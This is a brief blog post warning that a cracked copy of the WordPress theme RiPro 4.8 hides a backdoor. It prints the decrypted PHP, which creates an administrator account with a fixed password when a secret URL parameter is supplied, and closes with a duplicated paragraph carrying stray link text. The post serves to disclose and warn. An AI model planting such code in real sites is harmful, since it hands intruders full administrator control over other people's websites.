The ripro theme is a paid theme originally created by a Chinese developer. Many website owners like the ripro theme but are reluctant to spend money on the official version, so they download cracked versions of the ripro theme from the internet. The latest cracked version of ripro theme 4.8 has been exposed to contain a backdoor. If you have used it, go check immediately. The file containing the backdoor in the cracked ripro theme is located at:
RiPro4.8/wp-content/theme/ripro/inc/class/core.class.phpThis file is encrypted. The decrypted content is as follows:
add_action('wp_head', 'wp_backdoor');
function wp_backdoor()
{
if (md5($_GET['backdoor']) == '34d1f91fb2e514b8576fab1a75a89a6b') {
require('wp-includes/registration.php');
if (!username_exists('backdoor')) { //检测是否存在backdoor账户
$user_id = wp_create_user('backdoor', '123456'); //创建账户
$user = new WP_User($user_id);
$user->set_role('administrator'); //设置为管理员权限
}
}
}The purpose of this code is: Accessing via http(s)://your-domain/?backdoor=go will automatically create an administrator account with the username 'backdoor' and password '123456'.
Therefore, for the security of your website,
build my own websiteit's best not to use cracked themes. If you find encrypted files in themes downloaded from the internet, it's highly likely something is hidden inside. Learn more about
WordPress securityin related articles. Original source:
52pojie
Therefore, for the security of your website,build my own websiteit's best not to use cracked themes. If you find encrypted files in themes downloaded from the internet, it's highly likely something is hidden inside. Learn more aboutWordPress securityin related articles. Original source:52pojie
Comments are closed
The comment function for this article is closed. If you have any questions, please feel free to contact us through other channels.